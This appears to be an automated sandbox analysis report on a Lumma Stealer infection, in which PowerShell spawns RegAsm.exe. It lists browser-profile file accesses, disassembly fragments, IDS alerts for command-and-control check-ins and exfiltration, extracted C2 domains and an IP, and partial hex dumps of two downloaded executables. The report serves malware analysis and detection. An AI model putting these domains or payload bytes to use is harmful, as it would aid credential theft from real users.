              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]7_2_0040A960
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]7_2_00426170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push eax7_2_0040C36E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h7_2_0043DBD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_00409CC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh7_2_0043DCF0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], bl7_2_0040CE55
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]7_2_0042C6D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], dx7_2_00417E82
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh7_2_0043E690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]7_2_0042BFD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]7_2_0042BFDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_0042A060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_0041D074
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_0041D087
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042D085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], cl7_2_0042D085
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]7_2_0041597D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax7_2_00405910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax7_2_00405910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h7_2_00425920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_004286F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]7_2_00417190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_00422270
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h7_2_0040C274
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [00444284h]7_2_00425230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]7_2_0043CAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]7_2_004292D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebx7_2_004292D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]7_2_0042AAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [eax], cl7_2_00415ADC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, bx7_2_0042536C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]7_2_00402B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_00427307
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]7_2_00436B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]7_2_0043CBD6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]7_2_00407470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]7_2_00407470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_0042B475
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h7_2_00419C10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]7_2_0043CCE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], al7_2_0042B4BB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]7_2_0043CD60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_004345F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]7_2_00427653
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]7_2_0043CE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h7_2_0042A630
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]7_2_004296D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]7_2_00415EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00421EE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh7_2_004266E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_004286F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edi, eax7_2_00416E97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h7_2_0041CEA5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebx, 03h7_2_00428F5D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]7_2_00425F7D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h7_2_00414F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, edx7_2_00414F08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00420717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_00420717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h7_2_0043DFB0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:54123 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.4:54123 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:65361 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.4:65361 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49746 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:60620 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.4:60620 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58954 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.4:58954 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49742 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.4:49740 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:58836 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.4:58836 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49748 -> 172.67.206.64:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.206.64:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: dare-curbys.biz
              Source: Malware configuration extractorURLs: zinc-sneark.biz
              Source: Malware configuration extractorURLs: dwell-exclaim.biz
              Source: Malware configuration extractorURLs: se-blurry.biz
              Source: Malware configuration extractorURLs: print-vexer.biz
              Source: Malware configuration extractorURLs: covery-mover.biz
              Source: Malware configuration extractorURLs: formy-spill.biz
              Source: Malware configuration extractorURLs: impend-differ.biz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:23:51 GMTETag: "b200-628ee95401970"Accept-Ranges: bytesContent-Length: 45568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 35 5c c4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 08 00 00 00 e0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 22 00 00 e8 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 1
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:22:16 GMTETag: "48e00-628ee8f9c1375"Accept-Ranges: bytesContent-Length: 298496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 06:52:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 18:22:16 GMTETag: "48e00-628ee8f9c1375"Accept-Ranges: bytesContent-Length: 298496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 0d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 da 03 00 00 10 00 00 00 dc 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 20 00 00 00 f0 03 00 00 22 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c f6 00 00 00 20 04 00 00 50 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 20 05 00 00 02 00 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 39 00 00 00 30 05 00 00 3a 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 